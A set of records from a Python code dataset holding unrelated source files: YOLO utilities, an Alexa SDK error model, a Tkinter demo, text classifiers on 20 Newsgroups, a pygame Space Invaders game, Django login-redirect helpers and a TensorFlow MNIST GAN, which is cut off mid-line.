's']))\n\nmain()","sub_path":"edx_python_practice/Hangman/user_guess.py","file_name":"user_guess.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"605901721","text":"import torch\n\n\ndef select_device(force_cpu=False):\n if force_cpu:\n cuda = False\n device = torch.device('cpu')\n else:\n cuda = torch.cuda.is_available()\n device = torch.device('cuda:0' if cuda else 'cpu')\n\n if torch.cuda.device_count() > 1:\n device = torch.device('cuda' if cuda else 'cpu')\n print('Found %g GPUs' % torch.cuda.device_count())\n # print('Multi-GPU Issue: https://github.com/ultralytics/yolov3/issues/21')\n # torch.cuda.set_device(0) # OPTIONAL: Set your GPU if multiple available\n # print('Using ', torch.cuda.device_count(), ' GPUs')\n\n print('Using %s %s\\n' % (device.type, torch.cuda.get_device_properties(0) if cuda else ''))\n return device\n\ndef xyxy2xywh(x):\n # Convert bounding box format from [x1, y1, x2, y2] to [x, y, w, h]\n y = torch.zeros_like(x) if isinstance(x, torch.Tensor) else np.zeros_like(x)\n y[:, 0] = (x[:, 0] + x[:, 2]) / 2\n y[:, 1] = (x[:, 1] + x[:, 3]) / 2\n y[:, 2] = x[:, 2] - x[:, 0]\n y[:, 3] = x[:, 3] - x[:, 1]\n return y\n","sub_path":"yolov3_clw/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"46184342","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights\n# Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS\n# OF ANY KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations under the\n# License.\n#\nimport pprint\nimport six\nimport typing\nfrom enum import Enum\n\n\nif typing.TYPE_CHECKING:\n from typing import Dict, Optional\n\n\nclass Error(object):\n \"\"\"Error from LWA Client request.\n\n :param error_description: Description of the error\n :type error_description: (optional) str\n :param error_type: Type of error\n :type error_type: (optional) str\n \"\"\"\n deserialized_types = {\n 'error_description': 'str',\n 'error_type': 'str'\n }\n\n attribute_map = {\n 'error_description': 'error_description',\n 'error_type': 'error'\n }\n\n def __init__(self, error_description=None, error_type=None):\n # type: (Optional[str], Optional[str]) -> None\n \"\"\"\n :param error_description: Description of the error\n :type error_description: (optional) str\n :param error_type: Type of error\n :type error_type: (optional) str\n \"\"\"\n self.__discriminator_value = None\n\n self.error_description = error_description\n self.error_type = error_type\n\n def to_dict(self):\n # type: () -> Dict[str, object]\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {} # type: Dict\n\n for attr, _ in six.iteritems(self.deserialized_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else\n x.value if isinstance(x, Enum) else x,\n value\n ))\n elif isinstance(value, Enum):\n result[attr] = value.value\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else\n (item[0], item[1].value)\n if isinstance(item[1], Enum) else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n # type: () -> str\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n # type: () -> str\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n # type: (object) -> bool\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Error):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n # type: (object) -> bool\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other","sub_path":"ask-sdk-model/ask_sdk_model/services/lwa/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"309210765","text":"import tkinter as tk\nimport os\nimport math\nimport threading\nimport time\n\nclass View(tk.Frame):\n def __init__(self, parent, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.parent = parent\n self.parent.wm_title('Tkinter MVC Demo')\n self.parent.wm_geometry('800x600')\n\n\n self.area = tk.StringVar()\n self.area.set('Circle information')\n lbl = tk.Label(self.parent, text='hello', textvariable=self.area, fg='red', anchor=tk.W, font='TkFixedFont')\n lbl.pack()\n\n '''def update_old(self, subject, *args, **kwargs):\n msg = 'Circle: ({}, {}), r: {}, Area: {}'.format(subject.x, subject.y, subject.r, subject.area())\n self.area.set(msg)\n '''\n\n def update(self, text):\n msg = '{}'.format(text)\n self.area.set(msg)\n\n\nclass Model(threading.Thread):\n def __init__(self, gui):\n threading.Thread.__init__(self)\n self.gui = gui\n self.x = 0\n self.y = 0\n self.r = 1\n print(self.area())\n\n\n def area(self):\n return math.pi * self.r * self.r\n \n\n\n def run(self):\n print(self.area())\n while True:\n self.r += 1 \n print('r = {}, area = {}'.format(self.x, self.area()))\n\n\n msg = 'Circle: ({}, {}), r: {}, Area: {}'.format(self.x, self.y, self.r, self.area())\n self.gui.update(msg)\n time.sleep(1)\n\n\n\n\n\nif __name__ == '__main__':\n\n view = View(tk.Tk())\n\n model = Model(view)\n\n model.start()\n tk.mainloop()\n","sub_path":"python/gag/gui2.py","file_name":"gui2.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"266225365","text":"\nimport sklearn\nfrom sklearn.datasets import fetch_20newsgroups\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport itertools\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn import linear_model\nfrom sklearn import neighbors\nfrom sklearn import metrics\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB\n\nfrom sklearn.decomposition import TruncatedSVD\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn import neighbors, datasets\n\n\ndef load_data():\n # import and filter data\n newsgroups_train = fetch_20newsgroups(subset='train',shuffle=True, remove=('headers', 'footers', 'quotes'))\n newsgroups_test = fetch_20newsgroups(subset='test',shuffle=True, remove=('headers', 'footers', 'quotes'))\n\n # newsgroups_train = fetch_20newsgroups(subset='train',remove=('headers', 'footers', 'quotes'))\n # newsgroups_test = fetch_20newsgroups(subset='test',remove=('headers', 'footers', 'quotes'))\n class_names = newsgroups_train.target_names\n\n return newsgroups_train, newsgroups_test, class_names\n\ndef bow_features(train_data, test_data):\n # Bag-of-words representation\n bow_vectorize = CountVectorizer()\n bow_train = bow_vectorize.fit_transform(train_data.data) #bag-of-word features for training data\n bow_test = bow_vectorize.transform(test_data.data)\n feature_names = bow_vectorize.get_feature_names() #converts feature index to the word it represents.\n shape = bow_train.shape\n print('{} train data points.'.format(shape[0]))\n print('{} feature dimension.'.format(shape[1]))\n print('Most common word in training set is \"{}\"'.format(feature_names[bow_train.sum(axis=0).argmax()]))\n return bow_train, bow_test, feature_names\n\ndef tf_idf_features(train_data, test_data):\n # Bag-of-words representation\n tf_idf_vectorize = TfidfVectorizer(ngram_range=(1, 3), stop_words='english')\n tf_idf_train = tf_idf_vectorize.fit_transform(train_data.data) #bag-of-word features for training data\n feature_names = tf_idf_vectorize.get_feature_names() #converts feature index to the word it represents.\n tf_idf_test = tf_idf_vectorize.transform(test_data.data)\n return tf_idf_train, tf_idf_test, feature_names\n\ndef bnb_baseline(bow_train, train_labels, bow_test, test_labels):\n # training the baseline model\n binary_train = (bow_train>0).astype(int)\n binary_test = (bow_test>0).astype(int)\n\n model = BernoulliNB()\n model.fit(binary_train, train_labels)\n\n # evaluate the baseline model\n train_pred = model.predict(binary_train)\n print('BernoulliNB baseline train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(binary_test)\n print('BernoulliNB baseline test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n return model\n\ndef randomForest(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n model = AdaBoostClassifier(n_estimators=100)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Random Forest -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('Random Forest train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Random Forest test accuracy = {}'.format((test_pred == test_labels).mean()))\n return model\n\ndef Multi_NB(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the Multinomial_NB model\n model = MultinomialNB(alpha=0.015)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Multinomial Naive Bayes -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('Multinomial NB train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Multinomial NB test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # # gridsearch for best Hyperparameter\n # parameters = {'alpha': (1, 0.1, 0.01, 0.015, 0.001)}\n # gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n # gs_clf = gs_clf.fit(train_bow_tf_idf, train_labels)\n #\n # best_parameters = gs_clf.best_estimator_.get_params()\n # print('Best params using gridSearch:')\n # print(best_parameters)\n # gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n # print('New hyperparameters Multinomial NB train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n # gstest_pred = gs_clf.predict(bow_test_tf_idf)\n # print('New hyperparameters Multinomial NB test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n # print('---------------------------------------')\n # print()\n\n return model, test_pred\n\ndef Guassian_NB(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the Gaussian_NB model\n model = GaussianNB()\n model.fit(train_bow_tf_idf.toarray(), train_labels)\n\n print()\n print('------- Gaussian Naive Bayes -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf.toarray())\n print('Gaussian NB train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Gaussian NB test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # # gridsearch for best Hyperparameter\n # parameters = {'alpha': (1, 0.1, 0.01, 0.015, 0.001)}\n # gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n # gs_clf = gs_clf.fit(train_bow_tf_idf, train_labels)\n #\n # best_parameters = gs_clf.best_estimator_.get_params()\n # print('Best params using gridSearch:')\n # print(best_parameters)\n # gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n # print('New hyperparameters Gaussian NB train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n # gstest_pred = gs_clf.predict(bow_test_tf_idf)\n # print('New hyperparameters Gaussian NB test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n # print('---------------------------------------')\n # print()\n\n return model\n\ndef SVM(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the support vector machine (SVM) model. Linear classifiers (SVM) with SGD training\n\n model = SGDClassifier(loss='squared_hinge', average=100, penalty='l2', alpha=0.0001, random_state=None, max_iter=100, tol=None, n_jobs=-1)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Support Vector Machine (SVM) -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('SVM train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('SVM test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # # gridsearch for best Hyperparameter\n # parameters = {'alpha': (1, 0.1, 0.01, 0.001, 0.0001 ),\n # 'loss': ('squared_hinge', 'hinge' )\n # }\n # gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n # gs_clf = gs_clf.fit(train_bow_tf_idf, train_data.target)\n #\n # best_parameters = gs_clf.best_estimator_.get_params()\n # print('Best params using gridSearch:')\n # print(best_parameters)\n # gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n # print('New hyperparameters SVM train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n # gstest_pred = gs_clf.predict(bow_test_tf_idf)\n # print('New hyperparameters SVM test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n # print('---------------------------------------')\n # print()\n\n return model, test_pred\n\ndef SVM2(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training the support vector machine (SVM) model. Linear classifiers (SVM) with SGD training\n\n model = svm.SVC(kernel='poly', degree=3)\n model.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Support Vector Machine 2 Polynomial Degree 3 (SVM) -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('SVM train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('SVM test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n return model\n\n\ndef LR(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels):\n # training Logistic Regression Classifier model\n\n LR = linear_model.LogisticRegression()\n # model = LR.fit(train_bow_tf_idf, train_labels)\n model = LR.fit(train_bow_tf_idf, train_labels)\n\n print()\n print('------- Logistic Regression Classifier -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('Logistic Regression train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('Logistic Regression test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n # gridsearch for best Hyperparameter\n parameters = {'C': (1, 0.1, 0.01, 0.001)\n # 'penalty': ('l1', 'l2'),\n # 'dual': (False, True)\n }\n gs_clf = GridSearchCV(model, parameters, n_jobs=-1)\n gs_clf = gs_clf.fit(train_bow_tf_idf, train_data.target)\n\n best_parameters = gs_clf.best_estimator_.get_params()\n print('Best params using gridSearch:')\n print(best_parameters)\n gstrain_pred = gs_clf.predict(train_bow_tf_idf)\n print('New hyperparameters Logistic Regression train accuracy = {}'.format((gstrain_pred == train_labels).mean()))\n gstest_pred = gs_clf.predict(bow_test_tf_idf)\n print('New hyperparameters Logistic Regression test accuracy = {}'.format((gstest_pred == test_labels).mean()))\n print('---------------------------------------')\n print()\n\ndef KNN(train_bow_tf_idf, train_labels, bow_test_tf_idf, test_labels, K):\n # training KNN Classifier model\n\n KNN = neighbors.KNeighborsClassifier(K, weights='distance')\n model = KNN.fit(train_bow_tf_idf, train_data.target)\n\n print()\n print('------- KNN Classifier -------')\n # evaluate the model\n print('Default hyperparameters:')\n print(model.get_params())\n train_pred = model.predict(train_bow_tf_idf)\n print('KNN Regression train accuracy = {}'.format((train_pred == train_labels).mean()))\n test_pred = model.predict(bow_test_tf_idf)\n print('KNN Regression test accuracy = {}'.format((test_pred == test_labels).mean()))\n\n\ndef plot_confusion_matrix_color(matrix_c, classes,\n title='Confusion matrix',\n cmap=plt.cm.Reds):\n print('Confusion matrix')\n\n print(matrix_c)\n\n plt.imshow(matrix_c, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n\n fmt ='d'\n thresh = matrix_c.max() / 2.\n for i, j in itertools.product(range(matrix_c.shape[0]), range(matrix_c.shape[1])):\n plt.text(j, i, format(matrix_c[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if matrix_c[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\nif __name__ == '__main__':\n train_data, test_data, class_names = load_data()\n\n # Count Vectorization\n train_bow, test_bow, feature_names = bow_features(train_data, test_data)\n\n # TF-idf\n train_bow_tf_idf, test_bow_tf_idf, feature_names_tf_idf = tf_idf_features(train_data, test_data)\n\n # Baseline Bernoulli Naive Bayes\n bnb_model = bnb_baseline(train_bow, train_data.target, test_bow, test_data.target)\n print(bnb_model)\n\n # Multinomial NB\n model_MNB ,test_pred = Multi_NB(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # Gaussian NB\n # model_MNB = Guassian_NB(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # RandomForest\n # model_RF = randomForest(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # SVM Kernel 3rd Degree Polynomial\n # model_SVM2 = SVM2(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # Logistic Regression\n model_LR = LR(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n # KNN\n # model_LR = KNN(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target, 10)\n\n # SVM Linear SGD\n model_SVM, test_pred = SVM(train_bow_tf_idf, train_data.target, test_bow_tf_idf, test_data.target)\n\n ### Compute confusion matrix for SVM Linear SGD ###\n cnf_matrix = confusion_matrix(test_data.target, test_pred)\n np.set_printoptions(precision=3)\n\n # Plot non-normalized confusion matrix\n plt.figure()\n plot_confusion_matrix_color(cnf_matrix, classes=class_names,\n title='Confusion matrix')\n\n plt.show()\n\n","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":13702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"362185990","text":"import pygame\nfrom spaceship import Spaceship\nfrom alien import Alien\nimport random\n\nWIDTH = 1000\nHEIGHT = 700\n\ndef draw_player_health(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 65\n BAR_HEIGHT = 10\n fill = pct * BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n if pct > 0.6:\n col = (0,255,0)\n elif pct > 0.3:\n col = (255, 255, 0)\n else:\n col = (255,0,0)\n pygame.draw.rect(surf, col, fill_rect)\n pygame.draw.rect(surf, (255, 255, 255), outline_rect, 2)\n\n\nclass Game:\n def __init__(self):\n\n pygame.init()\n self.screen = pygame.display.set_mode((1000, 700))\n self.background = pygame.image.load(\"img/background1.jpg\")\n self.background = pygame.transform.scale(self.background, (1000, 700))\n pygame.display.set_caption(\"Space Invaders\")\n self.level = 0\n self.wave_length = 3\n self.all_sprites_list = pygame.sprite.Group()\n self.enemy_sprites_list = pygame.sprite.Group()\n self.lazer_sprites_list = pygame.sprite.Group()\n # self.spaceship_lazer_sprites_list = pygame.sprite.Group()\n self.playing = True\n self.spaceship = Spaceship(self, x=450, y=600)\n self.clock = pygame.time.Clock()\n\n # def new(self):\n\n def run(self):\n while self.playing:\n self.clock.tick(60)\n self.events()\n self.update()\n self.draw()\n\n def update(self):\n if len(self.enemy_sprites_list) == 0:\n self.level += 1\n self.wave_length +=2\n self.create_aliens()\n pos = pygame.mouse.get_pos()\n self.spaceship.move(pos[0])\n self.all_sprites_list.update()\n # print(self.lazer_sprites_list)\n hit1 = pygame.sprite.groupcollide(self.enemy_sprites_list, self.lazer_sprites_list, False, True, pygame.sprite.collide_mask)\n for enemy, lazer in hit1.items():\n if lazer[0].shooter == 1:\n enemy.health -= 1\n\n hit2 = pygame.sprite.spritecollide(self.spaceship, self.enemy_sprites_list, True)\n if hit2 or any(alien.off_screen() for alien in self.enemy_sprites_list):\n self.spaceship.lives -= 1\n\n def draw(self):\n self.screen.fill((0, 0, 0))\n self.screen.blit(self.background, (0, 0))\n self.all_sprites_list.draw(self.screen)\n font = pygame.font.SysFont(\"courier\", 25, bold=True)\n text = font.render(\"Lives: \" + str(self.spaceship.lives), 1, (0, 0, 0))\n self.screen.blit(text, (20, 10))\n text = font.render(\"Level: \" + str(self.level), 1, (0, 0, 0))\n self.screen.blit(text, (850, 10))\n for alien in self.all_sprites_list:\n if isinstance(alien, Alien):\n alien.draw_alien_health()\n self.screen.blit(alien.image, alien.rect)\n draw_player_health(self.screen, self.spaceship.rect.x, self.spaceship.rect.y + 70, self.spaceship.health / 100)\n pygame.display.flip()\n\n def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.playing = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n self.spaceship.shoot()\n\n def quit_game(self):\n global running\n running = False\n\n def create_aliens(self):\n if self.level <= 5:\n choices = [1, 2]\n elif 5 < self.level <= 10:\n choices = [1, 2, 3]\n else:\n choices = [2, 3]\n for i in range(self.wave_length):\n Alien(self, random.randint(50, WIDTH - 100), random.randint(-1500, -100), random.choice(choices))\n\n\ng = Game()\nwhile g.playing:\n g.run()\npygame.quit()\n\n# all_sprites_list.add(spaceship)\n\n\n# enemy_sprites_list.add(alien)\n\n# running = True\n#\n#\n# while running:\n#\n# # for event in pygame.event.get():\n# # if event.type == pygame.QUIT:\n# # running = False\n# # if event.type ==pygame.KEYDOWN:\n# # if event.key == pygame.K_SPACE and spaceship in all_sprites_list:\n# # spaceship.shoot()\n# #\n# # screen.fill((0,0,0))\n# # screen.blit(background, (0,0))\n# #\n# # if len(enemy_sprites_list) == 0:\n# # level += 1\n# # wave_length += 2\n# # create_aliens(level, wave_length)\n# #\n# # pos = pygame.mouse.get_pos()\n# # spaceship.move(pos[0])\n# #\n# # for i in spaceship.lazers:\n# # all_sprites_list.add(i)\n# #\n# # hit = pygame.sprite.groupcollide(enemy_sprites_list, all_sprites_list, False, False)\n# # for i in hit:\n# # print(i)\n# # # if hit[i][0] == spaceship:\n# # # lives -= 1\n# # # else:\n# # # hit[i][0].kill()\n# # # if lives <= 0:\n# # # font = pygame.font.SysFont(\"Courier\", 74, bold=True)\n# # # text = font.render(\"GAME OVER\", 1, (0,0,0))\n# # # screen.blit(text, (300, 300))\n# # # pygame.display.flip()\n# # # pygame.time.wait(3000)\n# # # running = False\n# #\n# # all_sprites_list.draw(screen)\n# # enemy_sprites_list.draw(screen)\n# # font = pygame.font.SysFont(\"courier\", 25, bold=True)\n# # text = font.render(\"Lives: \" + str(lives), 1, (0, 0, 0))\n# # screen.blit(text, (20, 10))\n# # text = font.render(\"Level: \" + str(level), 1, (0, 0, 0))\n# # screen.blit(text, (850, 10))\n# # all_sprites_list.update()\n# # enemy_sprites_list.update()\n# #\n# # pygame.display.update()\n# clock.tick(60)\n# pygame.quit()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"306421987","text":"from django.conf import settings\r\nfrom django.core.urlresolvers import reverse\r\n\r\n\r\n\r\nLOGIN_REDIRECT_URLNAME = getattr(settings, \"LOGIN_REDIRECT_URLNAME\", \"\")\r\n\r\n\r\n\r\ndef get_default_redirect(request, redirect_field_name=\"next\",\r\n login_redirect_urlname=LOGIN_REDIRECT_URLNAME):\r\n \"\"\"\r\n Returns the URL to be used in login procedures by looking at different\r\n values in the following order:\r\n\r\n - a REQUEST value, GET or POST, named \"next\" by default.\r\n - LOGIN_REDIRECT_URL - the URL in the setting\r\n - LOGIN_REDIRECT_URLNAME - the name of a URLconf entry in the settings\r\n \"\"\"\r\n if login_redirect_urlname:\r\n default_redirect_to = reverse(login_redirect_urlname)\r\n else:\r\n default_redirect_to = settings.LOGIN_REDIRECT_URL\r\n redirect_to = request.REQUEST.get(redirect_field_name)\r\n # light security check -- make sure redirect_to isn't garabage.\r\n if not redirect_to or \"://\" in redirect_to or \" \" in redirect_to:\r\n redirect_to = default_redirect_to\r\n return redirect_to\r\n\r\n\r\ndef user_display(user):\r\n func = getattr(settings, \"ACCOUNT_USER_DISPLAY\", lambda user: user.username)\r\n return func(user)\r\n","sub_path":"colab/apps/account/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"175539410","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/home/h4ckfu/Code/test/TheGANs/MNIST_data/\", one_hot=True)\n\n################### All your functions are belong... ##########################\n\n# http://bit.ly/leaky_relu\ndef my_leaky_relu(x):\n '''\n Basically choooses the max(x, x * 0.01) as an activation function\n '''\n return tf.nn.leaky_relu(x, alpha=0.01)\n\n### The G ###\n# the z is going to be the random noise that we start with...\ndef generator(z, reuse=None):\n\n with tf.variable_scope('gen', reuse=reuse):\n\n hidden1 = tf.layers.dense(inputs = z, units=128, activation=my_leaky_relu)\n hidden2 = tf.layers.dense(inputs = hidden1, units = 128, activation=my_leaky_relu)\n\n # 784, of course, is the flatened 28x28 pixel image we want to generate\n # tanh - NOT 0 to 1 it's -1 to 1 -- so random noise will be -1 - 1 as well\n output = tf.layers.dense(hidden2, units = 784, activation = tf.nn.tanh)\n\n return output\n\n\n### The D ###\ndef discriminator(X, reuse=None):\n\n with tf.variable_scope('dis', reuse=reuse):\n\n hidden1 = tf.layers.dense(inputs = X, units = 128, activation=my_leaky_relu)\n hidden2 = tf.layers.dense(inputs = hidden1, units = 128, activation=my_leaky_relu)\n\n logits = tf.layers.dense(hidden2, units = 1) # probability of real or fake\n output = tf.sigmoid(logits) # sigmoid of the logits\n\n return output , logits\n\n\n### Helper function for calculating loss with cross entropy (with_logits)\ndef loss_func(logits_in, labels_in):\n return tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(\n logits = logits_in, labels=labels_in))\n\n\n### TensorFlow placeholders\n# Places in memory where we'll store values later when defing these in the feed_dict\n\n# shape = None (batch size, so any number of rows) x 784 pixels (columns)\nreal_images = tf.placeholder(tf.float32, shape=[None, 784])\n\n# What we're feeding our generator - ,100 random points, its the holder for the noise\nz = tf.placeholder(tf.float32, shape=[None, 100])\n\n############################ Variables and such ###############################\n\nlearning_rate = 0.001\n\nbatch_size = 100\n\nlabel_smothing = 0.9\n\n# 100 times to low - just here so I can test to make sure script still works\nepochs = 5\n\n# this is the list that will hold sample images when we run the session\nsamples = []\n\n\n############### Calling the functions (cleaned up) #############################\n\n# Feeding G the placeholder z which we'll pass in as noise with the feed_dict in sess\nG = generator(z)\n\n# Feed D real images (first) for training so D knows what the img's should look like\nD_output_real, D_logits_real = discriminator(real_images)\n\n# Feed discriminator generated fakes by by passing in the results from G(z)\n# *** NOTE: This is the first way the functions interact\nD_output_fake, D_logits_fake = discriminator(G, reuse=True)\n\n\n############### Using the trainable_variables from the Functions ###############\n\n# list of tf.Variable created via the layers api in the functions\ntvars = tf.trainable_variables()\n\n# List comprehension - works because tf.variable_scope in the G & D functions\n# Gonna use these with AdamOptimizer\nd_vars = [var for var in tvars if 'dis' in var.name]\ng_vars = [var for var in tvars if 'gen' in var.name]\n\n########################### Calculating loss ##################################\n\n# loss_func is essentially tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits)\n# *** NOTE: G_loss = loss_func(D_logits_fake) is the 2nd way D & G connect...\n\n# We want all of the real data labels to be true - hense the tf.ones as labels\n# Because = real_images But not exactly 1 as to not overfit - \"close to 1\" = smooting\nD_real_loss = loss_func(D_logits_real, tf.ones_like(D_logits_real) * label_smothing)\n\n# so, just the opposite - all the labels are zero cause they are all fakes\nD_fake_loss = loss_func(D_logits_fake, tf.zeros_like(D_logits_fake))\n\n# Final discriminator and generator loss\nD_loss = D_real_loss + D_fake_loss\n\n# Remember D_logits_fake is actually discriminator(G) so logits(G -> D) - labels = 1\n# the generator \"thinks\" its making true images so labels = 1\nG_loss = loss_func(D_logits_fake, tf.ones_like(D_logits_fake))\n\n\n######## Calling Adam Optimizer train the minimized loss on these lists of variables\n\n# Minimize the D_loss on the d_var list ( of discriminator variables)\nD_trainer = tf.train.AdamOptimizer(learning_rate).minimize(D_loss, var_list=d_vars)\nG_trainer = tf.train.AdamOptimizer(learning_rate).minimize(G_loss, var_list=g_vars)\n\n########################### The Session Then ###################################\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n\n sess.run(init)\n\n for epoch in range(epochs):\n\n # how many batches does it take to go through all the training data\n num_batches = mnist.train.num_examples // batch_size\n\n for i in range(num_batches):\n\n batch = mnist.train.next_batch(batch_size)\n\n batch_images = batch[0].reshape((batch_size, 784))\n\n # rescale for the tanh activation function\n batch_images = batch_images * 2 - 1\n\n # again -1 to 1 because tanh - 100 is for the 100 random points\n batch_z = np.random.uniform(-1, 1, size=(batch_size, 100))\n\n # Run the optimizers - only care about the generators output tho\n # This is running the output of AdamOptimizer -> minimize the loss of the D variables\n _ = sess.run(D_trainer, feed_dict={real_images:batch_images, z:batch_z})\n _ = sess.run(G_trainer, feed_dict={z:batch_z})\n\n print(\"ON EPOCH {}\".format(epoch))\n\n # Sample from the Generator as we are training\n # Pass in some noise size in the shape of: 1 image, 100(batch size)\n sample_z = np.random.uniform(-1, 